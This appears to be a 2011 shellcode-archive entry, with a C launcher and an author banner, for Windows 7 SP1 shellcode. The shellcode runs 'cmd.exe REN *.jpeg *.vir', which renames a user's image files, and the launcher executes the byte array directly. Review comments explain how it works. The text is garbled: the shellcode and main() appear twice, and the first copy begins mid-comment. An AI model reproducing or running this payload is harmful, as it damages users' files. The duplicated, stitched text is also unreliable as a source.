 * \x6f\x2a\x96\x75) presumably hard-code absolute addresses of the build on
 * the "Tested on" line, so the sample only runs where those addresses match.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
/*
 * Demo launcher: transfers control into the file-scope `code` array and
 * only afterwards prints a message. argc/argv are unused.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * with non-executable data pages (DEP/NX) the call is expected to fault
 * rather than run.
 */
int main(int argc, char **argv)
{
((void (*)())code)();
/* Reached only if the called code returns to its caller; no trailing newline. */
printf("Renaming all .jpeg files to .vir files");
return 0;
}
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -
==================================================
Made by:
___________.__ ____ ___ __ .__
\__ ___/| |__ ____ | | \__________ __| | _|__|
| | | | \_/ __ \| | /\___ / | \ |/ / |
| | | Y \ ___/| | / / /| | / <| |
|____| |___| /\___ >______/ /_____ \____/|__|_ \__|
\/ \/Rats Crew \/ TheCod3r \/
Mail: Uzuki@live.de
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Sample bytes as a file-scope array. The tail is plain ASCII and decodes to
 *   cmd.exe REN *.jpeg *.vir
 * followed by a NUL -- the rename named in the title, and the simplest static
 * indicator for this sample.
 * NOTE(review): the two immediates after \xbb (\x39\xe7\x99\x75 and
 * \x6f\x2a\x96\x75) presumably hard-code absolute addresses of the build on
 * the "Tested on" line, so the sample only runs where those addresses match.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
/*
 * Demo launcher: transfers control into the file-scope `code` array and
 * only afterwards prints a message. argc/argv are unused.
 *
 * Casting a data array to a function pointer and calling it is undefined
 * behaviour in C; it only runs where the array's pages are executable, so
 * with non-executable data pages (DEP/NX) the call is expected to fault
 * rather than run.
 */
int main(int argc, char **argv)
{
((void (*)())code)();
/* Reached only if the called code returns to its caller; no trailing newline. */
printf("Renaming all .jpeg files to .vir files");
return 0;
}